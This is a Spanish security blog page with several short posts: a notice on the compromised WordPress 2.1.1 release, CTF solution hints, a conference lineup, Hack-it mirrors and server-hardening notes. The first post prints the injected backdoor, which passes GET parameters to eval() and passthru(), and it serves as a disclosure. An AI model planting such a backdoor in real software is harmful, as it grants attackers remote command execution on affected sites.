security « P0L0's Blog

4Mar/070

WordPress 2.1.1 Comprometido

Hace unos dias alguien ha entrado en la maquina de descargas de worpress y se han cambiado dos ficheros en wp-include en los cuales han metido codigo para ejecutar codigo por medio de parametro GET. Tal como dicen en la web de wordpress hay que actualizar inmeditamente a la version 2.1.2

El codigo injectado esta en estos dos ficheros:

wp-includes/feed.php

84
85
86

function comment_text_phpfilter($filterdata) {
    eval($filterdata);
}

149	if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

wp-includes/theme.php

408
409
410

function get_theme_mcommand($mcds) {
  passthru($mcds);
}

441	if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

Tagged as: security, wordpress No Comments

11Dec/060

hacker::quiz

Ya ha acabado la bkp 7ª edicion, y para quien le interese aqui os cuelgo aqui el codigo del hacker::quiz de este año. Realmente es muy sencillo, pero aun asi os colgare las soluciones.

Descargar hacker::quiz Read more... (402 words, estimated 1:36 mins reading time)

Level1

Aparentemente no parece que hay ningun error de programacion, pero si pruebas de buscar los .bak, *~... encuentras el fichero login.php~ y en el aparece la contraseña en md5. Con un cracker de md5 como por ejemplo lcrack. En pocos minutos saldra la contraseña del nivel.

Level2

Aqui hay que fijarse que en el codigo hay un "src=javascript" y que el codigo bueno esta en el fichero javascript. Aqui se una un algoritmo de encriptacion super sencillo, que se puede desencriptar facilmente cambiando la funcion generatePass para sacar la contraseña.

Tagged as: bkp, security No Comments

25Sep/060

Congreso No Con Name 2006

El proximo jueves 28 de Septiembre tendra lugar en el Parc Bit el congreso de seguridad informatica No Con Name 2006 que este año cuenta con ponentes traidores de fuera de España y con conferencias muy interesantes. Las conferencias que se daran seran las siguientes: Read more... (188 words, estimated 45 secs reading time)

Andrés Tarascó ( Madrid - SIA ) - Exploiting win32 design flaws
Ramón Pinuaga ( Murcia - S21sec ) - Auditoría en DB2 ( un enfoque práctico )
Jesús Olmos González ( Barcelona - Internet Sec. Auditors ) - Seguridad de Código mediante tecnología vírica
Ero Carrera ( Germany- Sabre-Security ) - Reverse Engineering Malware. The Analyst's View.
Raoul Chiesa ( Italy - Telecom Security Task Force ) - Having fun with X.25 hacking

Tagged as: ncn, security No Comments

22Aug/060

Hack-it de la Euskal Encounter 2006

Se ha publicado el Hack-it de este año para quien quiera jugar desde casa. Yo ya me lo he bajado para trastear un poco ;o)

He creado un mirror en binware. Los mirrors que hay son:

Hack-it, mirror universidad: TAR.GZ
Hack-it, mirror blog.txipinet.com (lento): TAR.GZ
Hack-it, mirror binware: TAR.GZ

Tambien se han publicado las soluciones del nivel 1 al 17

Solucion Hack-it: 1-5
Solucion Hack-it: 6-10
Solucion Hack-it: 11-15
Solucion Hack-it: 16-17

Tagged as: security No Comments

6Mar/050

Asegurando Server

Bueno, esta semana voy de dejar el servidor de hosting bien seguro. Ire poniendo todo lo que he ido haciendo. Por ahora tengo puesto unas cuantas cosas, pero como siempre la paranoia puede conmigo y no me parece suficientemente seguro ;P

Cosas instaladas: Read more... (385 words, estimated 1:32 mins reading time)

Portsentry
Snort
Firewall

/tmp y /home montados con noexec,nosuid

/dev/hda7       /tmp    ext3    defaults,noexec,nosuid                  0  2
/dev/hda8       /home   ext3    defaults,noexec,nosuid                  0  2

Tagged as: linux, php, security No Comments

Google Ads

Friends Blogs

Partners

Comics

License

Blog under the Creative Commons Attribution-ShareAlike 3.0 License

P0L0's Blog Opensource Projects and IT experiences